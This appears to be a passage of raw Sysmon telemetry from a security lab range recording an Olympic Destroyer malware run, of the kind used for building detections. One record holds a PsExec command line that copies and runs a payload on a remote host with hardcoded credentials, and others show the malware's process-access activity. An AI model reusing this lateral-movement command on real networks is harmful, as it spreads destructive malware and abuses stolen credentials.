p\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.024{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.024{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:26.463{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A8F780C57472AC182B4E9567051DCE,SHA256=DA28279510A1AEFE49960523B299EBC5AE18682869EE9F71BB010D98302E14B2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.826{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.660{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.660{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.660{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.607{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.607{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.607{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.607{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.607{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.607{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.607{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.592{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.592{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.576{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.576{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.576{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.576{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.429{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4633565FA2D66892EC33DB60B649240B,SHA256=96337DF0C498FFD6615CE86AE1C8E07169AD38A28B3B7E2C3FC81CAEA82F23E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.360{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFE650F90B6228A0ACAD0FC2DC4ABB8D,SHA256=BC992E074C3B1DA639AF3294B1C4B8ADE9C50828CA6A4EC2B3F124BB346A2601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.291{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-140MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.229{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.229{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.229{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000293023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.229{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.229{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF84cd02.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5AEC35F3B524B7B946D270D29CEBD2E,SHA256=75FA3828A9199B809D0E0F86831AE1D9FE25EBC4E1C1E49C1A21A6E20632CC7A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000293020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:26.224{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.207{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.207{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 